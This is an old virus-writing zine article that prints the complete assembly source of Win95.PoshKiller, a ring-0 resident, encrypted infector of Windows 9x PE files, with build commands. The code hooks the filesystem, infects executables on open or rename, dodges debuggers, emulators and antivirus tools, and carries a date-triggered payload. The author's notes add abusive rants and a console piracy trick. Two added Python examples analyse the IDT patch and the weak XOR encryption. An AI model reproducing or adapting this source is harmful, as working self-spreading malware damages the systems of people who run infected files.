Xine - issue #4 - Phile 209

/-----------------------------\
| Xine - issue #4 - Phile 209 |
\-----------------------------/

; [Win95.PoshKiller] - Ring-0 resident PE infector
; Copyright (c) 1999 by Billy Belcebu/iKX
;
; Virus Name : PoshKiller
; Virus Author : Billy Belcebu/iKX
; Origin : Spain
; Platform : Win95/98
; Target : PE files (EXE,SCR,CPL)
; Compiling : TASM 5.0 and TLINK 5.0 should be used
; tasm32 /ml /m3 poshkill,,;
; tlink32 /Tpe /aa /c /v poshkill,poshkill,,import32.lib,
; pewrsec poshkill.exe
; Features : Well, here goes the list of what this virus does:
; · Ring-0 virus by means of modifying the IDT.
; · Win9X resident encrypted PE infector (EXE/SCR/CPL).
; · Anti-emulators (FPU in decryptor, makes fake GPFs).
; · Anti-debugger (SEH, Anti-SoftICE, INT 3).
; · Anti-monitors (with Super's kinda tunneling trick).
; · Anti-heuristics (not detected by AVP32, NODICE32, etc.).
; · Infects on open, rename and on attribute change.
; · Uses Pentium instructions.
; · Graphical payload, thanx to the p0rt g0d nIgr0 :)
; Payload : The first graphical payload FULLY WORKING in Ring-0, because
; it uses port I/O to perform its action. It scrolls the screen
; contents from right to left. The payload was coded with the
; knowledge, ideas and presence of nIgr0.
; Notes : Well, about the name of the virus, I think it's quite clear.
; I hate those poshes, their attitude, their world slave of
; capitalism, slave of the fascism of fashion, trying to
; keep being the beautiful people... There are MANY of those
; around my life, but I try to stay isolated from them, I don't
; want to be as sick as them :) But, at least, let me ask an
; existential question that hurts me... Why are the posh girls
; the prettiest girls around? Hehehe, I ask this because
; it is a constant in my life: I know some impressively pretty
; girls, and ALL of them are really (and sadly) posh.
; Well, the worst is when a posh is also Catholic, but this
; is another story... I also know some of them (boys and
; girls), and they hate me as I hate 'em. Nice, heh? :)
; Miscellaneous : VERY INTERESTING! :) If some of you have a PlayStation (I
; know many people who waste their time playing with it, but
; anyway...), and you want to use pirate games, and you don't
; trust anyone to put in the goddamn multisystem chip, there
; is a trick to use pirate games without installing the
; chip. You'll need, of course, a PlayStation, at least
; one original game (a demo can be used too), and a pirate
; game. First, you must make your PlayStation able to
; keep the CD drive open while running games (this is done
; by a simple trick that most of you already know). Well, the
; trick consists of the following:
; 1º Put the original CD in its place, and you'll see how the
; PlayStation begins to spin it. But you will see that after
; a few seconds it slows the rotation down a little. Then
; you must substitute the pirate CD for the original one.
; 2º Then you'll see how the pirate CD begins spinning,
; and then, after a few seconds, you'll see that it slows the
; rotation down, and then substitute the original CD for the
; pirate one.
; 3º Now follows the hardest part. The original CD will begin
; spinning. And after 1 second you'll hear a "click"
; sound. Now is the moment. Quickly replace the original CD
; with the pirate CD and... Voilà! :)
;
; The horrible people, the horrible people
; It's as anatomic as the size of your steeple
; Capitalism has made it this way
; Old fashioned fascism
; will take it away!!!!
;
; -Marilyn Manson-
;
; Amunt València!!! (Come on València!!! The cup is ours!!!) (26-6-99),
; Billy Belcebu/iKX
;

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Constants, data and other shit |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

.586p ; Really needed!
.model flat ; Hehehe i love 32 bit stuph ;)

TRUE equ 1
FALSE equ 0

DEBUG equ TRUE ; Oh my beloved SoftIce... :)

; VxD functions used

VMM_Get_DDB equ 00010146h
IFSMgr_GetHeap equ 0040000Dh
IFSMgr_RetHeap equ 0040000Eh
IFSMgr_Ring0_FileIO equ 00400032h
UniToBCSPath equ 00400041h
IFSMgr_InstallFileSystemApiHook equ 00400067h

; IFSMgr_Ring0_FileIO functions used

R0_DELETEFILE equ 04100h
R0_FILEATTRIBUTES equ 04300h
R0_OPENCREATFILE equ 0D500h
R0_CLOSEFILE equ 0D700h
R0_READFILE equ 0D600h
R0_WRITEFILE equ 0D601h
R0_GETFILESIZE equ 0D800h

; FileSystem intercepted functions

IFSFN_FILEATTRIB equ 21h
IFSFN_OPEN equ 24h
IFSFN_RENAME equ 25h

; Constants of the virus

virus_size equ (offset virus_end-offset virus_start)
encrypt_size equ (offset virus_end-offset encrypt_start)
size_to_allocate equ virus_size+2048
section_flags equ 00000020h or 20000000h or 80000000h
rva_key equ (offset KeyEnc-offset virus_start)

IF DEBUG
Interrupt equ 05h
ELSE
Interrupt equ 03h ; Let'z antidebug their arse
ENDIF

rdtcs equ <dw 310Fh> ; RDTSC (0F 31h); misspelled, but used consistently below

; Macro for make the VxD Calls required

VxDCall macro VxDService
local @@@@@@
int 20h ; CD 20 +00 (the VMM dynalinks this into a
dd VxDService ; XX XX XX XX +02 direct call the first time it runs)
jmp @@@@@@ ; EB 04 +06
dd VxDService ; XX XX XX XX +08 (spare copy, see VxDFix)
@@@@@@:
endm

; You'll suffer... FUCKING POSH! The power of metal... The infernal punishment...

extrn ExitProcess:PROC
extrn MessageBoxA:PROC

.data

szTitle db "Win9X.PoshKiller."
db virus_size/1000 mod 10 +"0"
db virus_size/0100 mod 10 +"0"
db virus_size/0010 mod 10 +"0"
db virus_size/0001 mod 10 +"0"
db 00h

szMessage db "C'mon posh. I believe in myself and in anyone else,",10
db "while you believe in the capitalism; i innovate,",10
db "you copy; i live, you don't. Why? I killed you.",10
db "Copyright (c) 1999 by Billy Belcebu/iKX",10,0 ; NUL-terminate for MessageBoxA

; My neighbour torments me, all day on Los 40, he's told my old lady that I
; drink more than I should... "If I catch him on the stairs... I'll do him
; in with my guitar!"

.code

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Initialize virus, and get Ring-0 privilege |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

virus_start label byte

poshkiller:
IF DEBUG
int 3
ENDIF
pushad

jmp kutre_delta ; 'sup? I don't like the
petakakas: ; usual method: AVP32 catches
pop edi ; it :)

mov ecx,encrypt_size/4 ; ECX = Encrypted size in DWORDS

call overkey
KeyEnc dd 00000000h
TempByt dd 00000000h
overkey:
pop esi ; ESI = Pointer to enc. key
mov edx,[esi]
mov ebx,esi
add ebx,4 ; EBX = Pointer to a temp dword

finit ; Initialize math coprocessor

; Megafast FPU decryption!

eloop: fild dword ptr [edi] ; Push the dword to decrypt
fistp dword ptr [ebx] ; Pop in temporal address
xor dword ptr [ebx],edx ; Decrypt dword in that address
fild dword ptr [ebx] ; Push decrypted integral
fistp dword ptr [edi] ; Store the decrypted integral
add edi,4 ; Advance to next dword
loop eloop ; Loop until all is decrypted
jmp strip ; And go over that shitty call

kutre_delta: ; Shitty method to get the
call petakakas ; initial address to decrypt

encrypt_start label byte

db " [IAIDA] " ; Here she is! The girl with
; the sweetest smile I've ever
; known... also the best in
; many other fields :)~

; Pfft, maybe I am a bit of a sap :) But, damn, you don't know her...
; (and I don't want you to, suckers!!! She's mine and only mine!!! X-DDD)

strip: call getdeltax ; Ol' good days delta offset!
getdeltax:
pop ebp
mov eax,ebp
sub ebp,offset getdeltax

sub eax,(offset getdeltax-offset poshkiller)
sub eax,00001000h ; Get imagebase at runtime
newEIP equ $-4
mov dword ptr [ebp+ibase],eax

call SetUpSEH ; The code right after this CALL is the
mov esp,[esp+8] ; SEH handler: if the INT below faults
call restore_old_bytes ; (no ring-0), restore the host
jmp DeactivateSEH ; and just run it
SetUpSEH:
xor ebx,ebx ; Setup SEH
push dword ptr fs:[ebx]
mov fs:[ebx],esp

push edx
sidt fword ptr [esp-2] ; Limit lands at ESP-2, IDT base
pop edx ; in the pushed dword: EDX = IDT base

add edx,(Interrupt*8)+4 ; EDX -> high dword of the gate

mov ebx,[edx]
mov bx,word ptr [edx-4] ; EBX = old handler offset (hi:lo)

lea edi,[ebp+InterruptHandler] ; Wheeeeehoooowww?

mov [edx-4],di ; Offset bits 15..0
shr edi,16 ; Move MSW to LSW
mov [edx+2],di ; Offset bits 31..16

int Interrupt ; Ring-0 jump!

mov [edx-4],bx ; Restore old interrupt values
shr ebx,16 ; ROR, SHR, SAR... who cares?
mov [edx+2],bx

or ebp,ebp ; 1st generation shitzor
jz host

call restore_old_bytes ; Restore host's first bytes

DeactivateSEH:
xor ebx,ebx ; Restore old SEH handler
pop dword ptr fs:[ebx]
pop edx

back2host:
popad
mov ebx,00400000h ; Imagebase obtained at
ibase equ $-4 ; runtime
add ebx,00001000h ; Old EIP, patched during
base equ $-4 ; infection time

fninit ; Reset coprocessor state before returning

push ebx ; Return to host
ret
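
The ring-0 entry above lives or dies on the layout of one 8-byte IDT descriptor: SIDT hands the table base to ring-3 code (Win9x mapped the IDT writable for everyone), and the virus rewrites only the two halves of the handler offset, leaving the selector and type byte Windows put there. The following is an added example, not code from the phile: it packs and patches an interrupt gate in Python exactly the way the two word stores at [EDX-4] and [EDX+2] do, and models the `push edx / sidt [esp-2] / pop edx` trick. The table contents, selector 0x28 and type 0x8E are constructed sample values.

```python
import struct

GATE_SIZE = 8        # bytes per IDT descriptor
IDT_ENTRIES = 256


def build_gate(offset, selector=0x28, type_attr=0x8E):
    """Pack a 32-bit interrupt gate: offset[15:0], selector, reserved, type/DPL/P,
    offset[31:16].  Selector 0x28 and type 0x8E are constructed sample values."""
    return struct.pack("<HHBBH", offset & 0xFFFF, selector, 0, type_attr, offset >> 16)


def gate_offset(gate):
    """Reassemble the handler address from the two split offset words."""
    lo, _sel, _res, _type, hi = struct.unpack("<HHBBH", bytes(gate))
    return (hi << 16) | lo


def make_idt(first_handler=0xC0001000):
    """A constructed 256-entry table with a distinct handler offset per vector."""
    return b"".join(build_gate(first_handler + v * 0x10) for v in range(IDT_ENTRIES))


def patch_gate_offset(idt, vector, new_offset):
    """The virus' two word stores: with EDX = base + vector*8 + 4 it writes the low
    word of the handler at [EDX-4] and the high word at [EDX+2].  Returns the new
    table and the old offset (kept in EBX in the source) so it can be restored."""
    idt = bytearray(idt)
    edx = vector * GATE_SIZE + 4
    old = gate_offset(idt[edx - 4:edx + 4])
    struct.pack_into("<H", idt, edx - 4, new_offset & 0xFFFF)
    struct.pack_into("<H", idt, edx + 2, (new_offset >> 16) & 0xFFFF)
    return bytes(idt), old


def sidt_image(base, limit=IDT_ENTRIES * GATE_SIZE - 1):
    """6-byte pseudo-descriptor exactly as SIDT stores it: limit:16 then base:32."""
    return struct.pack("<HI", limit, base)


def base_from_stack(stack_bytes):
    """`push edx ; sidt [esp-2] ; pop edx`: stack_bytes starts at ESP-2, so the
    base is the dword at offset 2, i.e. the pushed slot that POP EDX reads back."""
    return struct.unpack_from("<I", stack_bytes, 2)[0]


if __name__ == "__main__":
    table = make_idt()
    patched, saved = patch_gate_offset(table, 3, 0x00401234)
    print(hex(saved), hex(gate_offset(patched[3 * GATE_SIZE:4 * GATE_SIZE])))
```

Only the offset words change; the selector and the type/DPL byte in the middle of the descriptor are untouched, which is why the gate keeps working as a ring-0 trap after the patch and why restoring the two saved words is enough to undo it.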

; SHOOT SHOOT SHOOT MOTHERFUCKER!!!!!!!!!!!!!

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Restore original host's first bytes |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

restore_old_bytes:
mov edi,dword ptr [ebp+ibase] ; Restore first bytes
add edi,dword ptr [ebp+base] ; EDI = Old EIP
lea esi,[ebp+oldjmpy] ; ESI = Original bytes
mov ecx,sjumpy
rep movsb
ret

; I went to god just to see and i was looking at me!

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Ring-0 code |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

InterruptHandler:
pushad

call shitz0r ; Get Ring-0 delta offset
shitz0r:
pop ebp
sub ebp,offset shitz0r

; Note: DEBUG is defined with EQU in both builds (TRUE or FALSE), so this
; IFNDEF never assembles the SoftICE check; the same goes for @@5 in VxDTblz.
IFNDEF DEBUG
mov eax,202h ; Detect SoftICE
@@5: VxDCall VMM_Get_DDB
jecxz no_softice
jmp r3_back ; If it's there, avoid install
no_softice: ; the virus ;)
ENDIF

mov eax,dr2
cmp eax,"LLIK" ; Are we resident?
jz r3_back ; Yez, go away

push size_to_allocate ; Get Memory from the heap
@@1: VxDCall IFSMgr_GetHeap
pop ecx ; Fucking VxD services... :)

or eax,eax ; Function successful?
jz r3_back ; Back to the boring Ring-3! :(

and byte ptr [ebp+semaphore],0 ; Reset semaphore variable :)

xchg edi,eax ; Where move virus

push edi ; And save it for later
lea esi,[ebp+poshkiller]
mov ecx,virus_size
rep movsb ; Move virus to its TSR location ;)
pop edi

lea ecx,[edi+New_Handler] ; Install FileSystem Hook
push ecx
@@2: VxDCall IFSMgr_InstallFileSystemApiHook
pop ecx

xchg esi,eax ; ESI = Last hook handler
push esi
add esi,4 ; ESI = Hook info
tunnel: lodsd
xchg eax,esi
add esi,08h
js tunnel ; Walk the chain while the next pointer
; is a high (sign-bit set) ring-0 address;
; the first one below 80000000h is the end
mov dword ptr [edi+ptr_top_chain],eax ; Save in its var in mem
pop eax ; EAX = Last hook handler
mov dword ptr [edi+Old_Handler],eax

mov eax,"LLIK" ; Kewl residence mark :)
mov dr2,eax

r3_back:
popad
iretd ; return to Ring-3 :(

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | FileSystem hook |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

New_Handler equ $-(offset virus_start)

FSA_Hook:
enter 20h,00h ; Create stack frame

; Some useful stuff in stack, now in EBP
; --------------------------------------
;
; [EBP+1Ch] -> pointer to IOREQ structure.
; [EBP+18h] -> codepage that the user string was passed in on.
; [EBP+14h] -> kind of resource the operation is being performed on.
; [EBP+10h] -> the 1-based drive the operation is being performed on
; (-1 if UNC).
; [EBP+0Ch] -> function that is being performed.
; [EBP+08h] -> address of the FSD function that is to be called for this
; API.

mov ecx,6 ; Push all that with a loop,
mov ebx,1Ch ; it's the most compact
pushit: mov eax,[ebp+ebx] ; way to do this :)
push eax
sub ebx,4
loop pushit

mov eax,dword ptr [ebp+0Ch] ; EAX = Function
not eax

cmp eax,not IFSFN_OPEN ; File Open? Infect if it is
jz infect

cmp eax,not IFSFN_RENAME ; File Rename? Infect if it is
jz infect

cmp eax,not IFSFN_FILEATTRIB ; File Attribute change?
jz infect ; Infect if it is

back2oldhandler:
db 0B8h ; MOV EAX,imm32 opcode
Old_Handler equ $-(offset virus_start)
OldFSA dd 00000000h
call [eax] ; Call previous handler
add esp,18h ; Fix stack
leave
ret

infect:
pushad
call ring0_delta ; Get delta offset of this
ring0_delta:
pop ebx
sub ebx,offset ring0_delta

cmp byte ptr [ebx+semaphore],00h ; Avoid recursive infection :)
jnz pushnback

inc byte ptr [ebx+semaphore] ; Red light semaphore! :)

lea esi,dword ptr [ebx+top_chain] ; Make null top chain, so we
lodsd ; avoid monitors by means of
xor edx,edx ; cutting their balls :)
xchg [eax],edx

pushad
call infection_stuff ; Infect!
popad

mov [eax],edx ; Restore top chain

dec byte ptr [ebx+semaphore] ; Green light!

pushnback:
popad
jmp back2oldhandler

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Infect file if EXE |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

infection_stuff:
lea edi,[ebx+fname]
push edi
mov eax,[ebp+10h]
cmp al,0FFh
jz wegotdrive
add al,"@"
stosb
mov al,":"
stosb

wegotdrive:
xor eax,eax
push eax ; push 00h
inc ah
push eax ; push 100h
mov eax,[ebp+1Ch]
mov eax,[eax+0Ch]
add eax,4
push eax ; push offset unicode_filename
push edi ; push offset asciiz_filename

@@3: VxDCall UniToBCSPath ; Convert to ASCII

add esp,10h
add edi,eax
xor eax,eax ; Make string null-terminated
stosb

pop edi ; Get end of string :)
xor al,al
scasb
jnz $-1

mov eax,dword ptr [edi-05h] ; EAX = Extension of file
or eax,20202020h ; make lowercase extension
not eax ; no, no, no!! :)

cmp eax,not "exe." ; Infect if EXE file
jz itsveryfunny
cmp eax,not "lpc." ; Infect if CPL file
jz itsveryfunny
cmp eax,not "rcs." ; Infect if SCR file
jz itsveryfunny

jmp notsofunny

itsveryfunny:
IF DEBUG ; Only if debugging shitz0rz
cmp dword ptr [edi-0Ch],"TAOG" ; If not a goat, don't execute
jnz notsofunny
ENDIF

call payload ; Launch payload (if date matchz)


lea edi,[ebx+fname]
pushad
call AvoidShitFiles
popad
jc notsofunny

mov esi,edi ; Get File Attributes
mov eax,R0_FILEATTRIBUTES
push eax
call R0_FileIO
pop eax

jc notsofunny

push esi ; Save'em
push ecx

xor ecx,ecx ; Clear attributes
inc eax
push eax
call R0_FileIO

jc stillnotsofunny

mov esi,edi ; Open file a'la DOS
mov eax,R0_OPENCREATFILE
xor ecx,ecx
mov edx,ecx
inc edx ; EDX = 1
mov ebx,edx
inc ebx ; EBX = 2
call R0_FileIO

jc stillnotsofunny

xchg eax,ebx ; hehehe... as we did in DOS :)

call inf_delta ; Plurg... Delta offset!
inf_delta:
pop ebp
sub ebp,offset inf_delta

mov eax,R0_READFILE ; Read the dword that marks
push eax ; us the beginning of PE
mov ecx,4 ; header
mov edx,03Ch
lea esi,[ebp+pehead] ; There goez the PE header offzet
call R0_FileIO

pop eax
mov edx,dword ptr [ebp+pehead] ; Now read 1024 bytes of PE
lea esi,[ebp+header] ; header. I think it's enough.
mov ecx,400h
call R0_FileIO

cmp dword ptr [esi],"EP" ; Is it PE?
jnz muthafucka

cmp dword ptr [esi+4Ch],"HSOP" ; Was it already infected?
jz muthafucka
mov dword ptr [esi+4Ch],"HSOP" ; Damned poshes

mov edi,esi ; Save in EDI the PE offset

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | PE Infection routinez |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

movzx eax,word ptr [edi+06h] ; EAX = NumberOfSections
dec eax
imul eax,eax,28h ; (n-1)*sizeof(IMAGE_SECTION_HEADER)
add esi,eax
add esi,78h ; Skip the header up to DataDirectory
mov edx,[edi+74h] ; EDX = NumberOfRvaAndSizes
shl edx,03h ; 8 bytes per directory entry
add esi,edx ; ESI = last section header
; EDI = PE header
mov edx,[esi+10h] ; EDX = SizeOfRawData
mov eax,edx ; EAX = SizeOfRawData
add edx,[esi+0Ch] ; EDX = New EIP
add eax,[esi+14h] ; EAX = Where append virus
push eax ; Save it

push dword ptr [esi+10h] ; Save actual SizeOfRawData

mov eax,virus_size ; EAX = VirusSize
add eax,[esi+10h] ; EAX = VirusSize+SizeOfRawData
mov ecx,[edi+3Ch] ; ECX = FileAlignment
call align ; Align it!
mov [esi+10h],eax ; EAX = New SizeOfRawData &
mov [esi+08h],eax ; New VirtualSize

add eax,[esi+0Ch] ; EAX = New SizeOfImage (VA + size
mov [edi+50h],eax ; of last section). Put it!

pop eax ; EAX = Old SizeOfRawData
mov ecx,[esi+10h] ; ECX = New SizeOfRawData
sub ecx,eax ; Get the difference (size to
push ecx ; append) and save it

mov eax,[edi+28h] ; EAX = Host's EIP
mov dword ptr [ebp+base],eax ; Save it
mov dword ptr [ebp+newEIP],edx ; And where virus begins

sub edx,eax ; Construct relative offset
sub edx,sjumpy ; for make the jump
mov dword ptr [ebp+(jumpy+1)],edx ; Store the address

or [esi+24h],section_flags ; Update section's flagz

mov esi,edi
add esi,0F8h-28h ; Pointer to 1st section-28h
next_sec: add esi,28h ; (assumes 16 data directories)
mov edx,eax ; Put in EDX the original EIP
sub edx,[esi+0Ch] ; Remove the VirtualAddress
cmp edx,[esi+08h] ; Is EIP pointing to this sec?
jae next_sec ; If not, loop again

or [esi+24h],section_flags ; Make the EP section writable too
; (restore_old_bytes writes into it)

push esi ; Read first bytes beginning
mov eax,R0_READFILE ; from the EIP, the first
add edx,[esi+14h] ; bytes that are executed
lea esi,[ebp+oldjmpy] ; by the program, and save'em
mov ecx,sjumpy
call R0_FileIO
pop esi

mov eax,R0_WRITEFILE ; Write it some shit to pass
mov ecx,sjumpy ; the control to the virus
push esi ; See jumpyx label for more
lea esi,[ebp+jumpyx] ; details ;)
call R0_FileIO
pop esi

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Append, and close file |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

mov eax,R0_WRITEFILE ; Write the modified header
mov ecx,400h ; to the file
mov edx,dword ptr [ebp+pehead]
lea esi,[ebp+header]
call R0_FileIO

push virus_size ; Allocate the virus size
@@6: VxDCall IFSMgr_GetHeap
pop ecx

mov dword ptr [ebp+temp_addr],eax

pushad
call VxDFix
popad

xchg eax,edi ; Copy virus to temporal
push edi ; heap chunk
lea esi,[ebp+virus_start]
rep movsb
pop esi

push esi

rdtcs ; Get a random number
xchg eax,edx
mov dword ptr [esi+rva_key],edx ; Save encrypt key in virus
add esi,virus_size-encrypt_size
mov edi,esi
mov ecx,encrypt_size/4

el00p: lodsd ; Encrypt virus
xor eax,edx
stosd
loop el00p

pop esi ; ESI = Ptr to virus_start

pop ecx ; ECX = Size (rounded) to append
pop edx ; EDX = Ptr where append

mov eax,R0_WRITEFILE ; Append virus
call R0_FileIO

push dword ptr [ebp+temp_addr]
@@7: VxDCall IFSMgr_RetHeap ; Free memory used by 2nd copy
pop ecx

IF DEBUG
pushad
call beepy
popad
ENDIF

muthafucka:
mov eax,R0_CLOSEFILE ; Close file
call R0_FileIO

stillnotsofunny:
pop eax ; Restore its attributes
pop ecx
pop esi
call R0_FileIO

notsofunny:
ret

R0_FileIO: ; Optimize for the table
@@4: VxDCall IFSMgr_Ring0_FileIO
ret

; On input:
; EAX = Number to align
; ECX = Alignment factor
; On output:
; EAX = Aligned number

align:
push edx
xor edx,edx
push eax
div ecx ; EDX = EAX mod ECX
pop eax
sub ecx,edx ; Note: if EAX is already aligned (EDX = 0)
add eax,ecx ; this still adds a full ECX, so the file
pop edx ; gets one extra alignment unit of padding
ret
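
The encryption loop at el00p above and the FPU decryptor at eloop near the top of the file are two sides of one transform. The decryptor pushes every dword through `fild`/`fistp` before and after the XOR; those are integer loads, and every int32 is exactly representable in the x87 register, so the round-trip is the identity and the "megafast FPU decryption" is a plain dword XOR with the key that sits in clear at KeyEnc. The key is the low dword of RDTSC, and because the encrypted region starts with the " [IAIDA] " string, it can also be recovered by known plaintext. This is an added example, not code from the phile, modelling both loops in Python; the sample body and key are constructed.

```python
import struct

KNOWN_PLAINTEXT = b" [IAIDA] "   # first bytes after encrypt_start in the source


def fpu_roundtrip(dword):
    """`fild dword ptr [x]` then `fistp dword ptr [y]`: load as signed int32, store back.
    A Python float (double) holds every int32 exactly, like the x87 64-bit mantissa."""
    signed = struct.unpack("<i", struct.pack("<I", dword))[0]
    return struct.unpack("<I", struct.pack("<i", int(float(signed))))[0]


def encrypt(body, key):
    """The el00p loop: lodsd / xor eax,edx / stosd over encrypt_size/4 dwords."""
    if len(body) % 4:
        raise ValueError("body must be a whole number of dwords, as encrypt_size/4 assumes")
    return b"".join(struct.pack("<I", d ^ key) for (d,) in struct.iter_unpack("<I", body))


def decrypt(body, key):
    """The eloop loop, including both FPU round-trips around the XOR."""
    out = bytearray()
    for (d,) in struct.iter_unpack("<I", body):
        out += struct.pack("<I", fpu_roundtrip(fpu_roundtrip(d) ^ key))
    return bytes(out)


def recover_key(encrypted):
    """Known-plaintext: first ciphertext dword XOR ' [IA' gives the key; the rest of
    the known string confirms it so a wrong guess is rejected instead of returned."""
    key = struct.unpack_from("<I", encrypted)[0] ^ struct.unpack_from("<I", KNOWN_PLAINTEXT)[0]
    n = len(KNOWN_PLAINTEXT) // 4 * 4
    if decrypt(encrypted[:n], key) != KNOWN_PLAINTEXT[:n]:
        raise ValueError("known plaintext does not confirm the key")
    return key


if __name__ == "__main__":
    # constructed 16-byte body: the marker string plus NOP filler
    sample = KNOWN_PLAINTEXT + b"\x90" * 7
    enc = encrypt(sample, 0xDEADBEEF)
    print(hex(recover_key(enc)), decrypt(enc, recover_key(enc)) == sample)
```

Whether the key is read from KeyEnc or recovered from the marker, the same `decrypt` yields the body; the FPU detour only costs emulators that do not implement `fild`/`fistp`, it adds nothing against an analyst.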

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Graphical payload if date is 26th of October |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

payload:
mov al,07h ; Get date
out 70h,al
in al,71h

cmp al,26h ; Is it 26th?
jnz no_payload ; No, shit.

mov al,08h ; Get month
out 70h,al
in al,71h

cmp al,10h ; Is it 10th?
jnz no_payload ; No, shit.

xor ebx,ebx ; Make 0 the counter
xor ecx,ecx
dec ecx ; Make -1 the repetition count :)

scroll:
mov edx,03D4h ; Graphical payload by using
mov al,0Ch ; ports. Original code in
out dx,al ; ATT assembler by nIgr0, and
mov edx,03D5h ; adapted by him and me at my
mov al,bh ; home the 30th of June :)
out dx,al ; Thanx nIgr0! Go on with
mov edx,03D4h ; "that" thingy :)
mov al,0Dh
out dx,al
mov edx,03D5h
mov al,bl
out dx,al
inc ebx
push ecx
mov ecx,0000FFFFh ; Some delay, for slowdown a
loop $ ; little the effect
pop ecx
loop scroll

no_payload:
ret

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Avoid infection of certain files |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

AvoidShitFiles:
lea esi,[ebx+@@BadProgramz] ; Ptr to table
mov eax,"." ; Search filename for a dot
scasb
jnz $-1
mov eax,"\" ; Now reverse the direction and search
std ; for the last \
scasb
jnz $-1
inc edi ; Fix it
inc edi
cld
ASF_Loop:
xor eax,eax ; Clear EAX
lodsb ; Load size of string in AL
cmp al,0BBh ; End of table?
jz AllShitFilesProcessed ; Oh, shit!
xchg eax,ecx ; Put Size in ECX
push edi ; Preserve program pointer
rep cmpsb ; Compare both strings
pop edi ; Restore program pointer
jz ShitFileFound ; Damn, a shitty file!
add esi,ecx ; Pointer to another string
jmp ASF_Loop ; in table & loop
AllShitFilesProcessed:
mov cl,00h ; Overlap, so CL = 0F9h
org $-1
ShitFileFound:
stc ; Set carry
ret

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Fix all VxDCallz |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

VxDFix:
mov ecx,VxDTbSz ; Number of VxDs
lea esi,[ebp+VxDTblz] ; Pointer to table
@lo0pz: lodsd ; Load current offset in EAX
add eax,ebp ; Add delta :)
mov word ptr [eax],20CDh ; Put back INT 20h (the VMM patches
mov edx,dword ptr [eax+08h] ; it into a direct call the first
mov dword ptr [eax+02h],edx ; time it runs) and the service ID
loop @lo0pz ; from the macro's spare copy
ret

; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; | Interesting tables |
; =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

VxDTblz label byte
dd offset (@@1) ; IFSMgr_GetHeap
dd offset (@@2) ; IFSMgr_InstallFileSystemApiHook
dd offset (@@3) ; UniToBCSPath
dd offset (@@4) ; IFSMgr_Ring0_FileIO
IFNDEF DEBUG
dd offset (@@5) ; VMM_Get_DDB
ENDIF
dd offset (@@6) ; IFSMgr_GetHeap
dd offset (@@7) ; IFSMgr_RetHeap
VxDTbSz equ (($-offset VxDTblz)/4) ; Numbah of VxDCalls in code

; Files to ignore, don't infect'em!

@@BadProgramz label byte
db 02h,"TB" ; ThunderByte?
db 02h,"F-" ; F-Prot?
db 03h,"NAV" ; Norton Antivirus?
db 03h,"AVP" ; AVP?
db 03h,"WEB" ; DrWeb?
db 03h,"PAV" ; Panda?
db 03h,"DRW" ; DrWeb?
db 04h,"DSAV" ; Dr Solomon?
db 03h,"NOD" ; Nod-Ice?
db 06h,"WINICE" ; SoftICE?
db 06h,"FORMAT" ; Format?
db 05h,"FDISK" ; Fdisk?
db 08h,"SCANDSKW" ; ScanDisk?
db 06h,"DEFRAG" ; Defrag?
db 0BBh

